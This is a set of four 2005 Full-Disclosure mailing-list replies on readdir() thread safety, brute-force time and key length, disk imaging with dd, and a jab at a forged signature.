On 06 Nov 05, at 01:00, [EMAIL PROTECTED] wrote: Then you never really understood the implementation, seems. Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work. I don't see how that is relevant; the typical use of readdir() is as follows: DIR *dirp = opendir(name); while ((dent = readdir(dirp)) != NULL) { ... } closedir(dirp); Nothing other threads do with readdir() on different dirp's will influence what dent points to. I have *never* seen a program where multiple threads read from a single dirp; and I can't image the use. In practice, you're correct. In theory, however, consider the following code path. THREAD 1 THREAD 2 ---- DIR *d1 = opendir(dir1); DIR *d2 = opendir(dir2); dent1 = readdir(dir1); dent2 = readdir(dir2); use(dent1); In most implementations, dent1 != dent2. HOWEVER, there is no guarantee that they will not both point to the same statically allocated buffer, and some implementations may do so. For example, this is why ctime_r exists: ctime returns a pointer to a statically allocated buffer, and hence is not thread safe. You are correct, though, that the glibc implementation of readdir is thread-safe, so readdir_r is unnecessary in all common situations. PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Comparing Algorithms On The List OfHard-to-brut-force?
On 01 Nov 05, at 10:11, Brandon Enright wrote: Brute forcing an algorithm suggests that you are not attacking a weakness or known flaw in the algorithm but rather just running through the keyspace trying to recover the plaintext. In that case, whichever allows you to use the most bits is what you want. Note that the encryption speed of an algorithm is *not* a significant factor in the time taken to brute-force it, except for extremely small keyspaces! Remember that the time taken to brute-force an N-bit algorithm that takes K seconds per encryption is, on average N K * 2 which increases much more rapidly with N than it does with K. Adding even one more bit will double the average time taken to brute-force an algorithm, while using a slower algorithm will only increase the difficulty marginally. Also note that anything beyond 256 bits is silly. Brute-forcing a 256- bit algorithm can be shown to be PHYSICALLY impossible, so there's no reason to go anywhere beyond that. PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Forensic help?
On 11 Sep 05, at 15:49, James Wicks wrote: Here is a way to do it on the cheap: 1. Ghost the hard drive with Symantec Ghost - http:// www.symantec.com/sabu/ghost/ghost_personal/ man dd PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft
On 12 Apr 2005, at 00:21, Ag. System Administrator wrote: ms_sig.jpg I suppose you believe the signature on this message too, then. PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/